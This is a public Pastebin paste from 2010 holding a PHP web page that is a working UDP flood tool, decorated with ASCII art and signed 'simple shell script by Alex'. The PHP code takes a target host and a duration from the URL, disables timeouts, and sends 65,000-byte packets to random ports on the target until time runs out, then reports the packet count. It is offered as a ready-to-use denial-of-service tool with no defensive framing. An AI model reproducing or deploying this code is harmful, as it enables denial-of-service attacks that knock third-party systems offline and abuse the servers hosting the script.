Share Pastebin
Guest
Public paste!

LT1 Speech

By: a guest | Mar 22nd, 2010 | Syntax: None | Size: 3.01 KB | Hits: 64 | Expires: Never
This paste has a previous version, view the difference. Copy text to clipboard
  1. <html>
  2. <body>
  3. <center>
  4. <font color="00FF00">
  5. <pre>
  6. ___________________________0_____________________________<br>
  7. ___________________________00____________________________<br>
  8. __________________________0000___________________________<br>
  9. _________________________000000__________________________<br>
  10. ______________00_________000000__________00______________<br>
  11. _______________0000______000000______00000_______________<br>
  12. _______________000000____0000000___0000000_______________<br>
  13. ________________000000___0000000_0000000_________________<br>
  14. _________________0000000_000000_0000000__________________<br>
  15. ___________________000000_00000_000000___________________<br>
  16. ___________0000_____000000_000_0000__000000000___________<br>
  17. ____________000000000__0000_0_000_000000000______________<br>
  18. _______________000000000__0_0_0_000000000________________<br>
  19. ___________________0000000000000000______________________<br>
  20. ________________________000_0_0000_______________________<br>
  21. ______________________00000_0__00000_____________________<br>
  22. _____________________00_____0______00____________________<br>
  23.  
  24. </pre>
  25. <STYLE>
  26. input{
  27. background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666;
  28. }
  29. button{
  30. background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666;
  31. }
  32. body {
  33. background-color: #000000;
  34. }
  35. </style>
  36. <?php
  37. //UDP
  38. if(isset($_GET['host'])&&isset($_GET['time'])){
  39.     $packets = 0;
  40.     ignore_user_abort(TRUE);
  41.     set_time_limit(0);
  42.    
  43.     $exec_time = $_GET['time'];
  44.    
  45.     $time = time();
  46.     //print "Started: ".time('d-m-y h:i:s')."<br>";
  47.     $max_time = $time+$exec_time;
  48.  
  49.     $host = $_GET['host'];
  50.    
  51.     for($i=0;$i<65000;$i++){
  52.             $out .= 'X';
  53.     }
  54.     while(1){
  55.     $packets++;
  56.             if(time() > $max_time){
  57.                     break;
  58.             }
  59.             $rand = rand(1,65000);
  60.             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  61.             if($fp){
  62.                     fwrite($fp, $out);
  63.                     fclose($fp);
  64.             }
  65.     }
  66.     echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  67.     echo '<br><br>
  68.         <form action="'.$surl.'" method=GET>
  69.         <input type="hidden" name="act" value="phptools">
  70.         Host: <br><input type=text name=host><br>
  71.         Length (seconds): <br><input type=text name=time><br>
  72.         <input type=submit value=Go></form>';
  73. }else{ echo '<br><b>UDP Flood</b><br>
  74.             <form action=? method=GET>
  75.             <input type="hidden" name="act" value="phptools">
  76.             Host: <br><input type=text name=host value=><br>
  77.             Length (seconds): <br><input type=text name=time value=><br><br>
  78.             <input type=submit value=Go></form>';
  79. }
  80. ?>
  81. _________________________________________________________<br>
  82. Simple shell script by Alex
  83.  
  84. </center>
  85. </body>
  86. </html>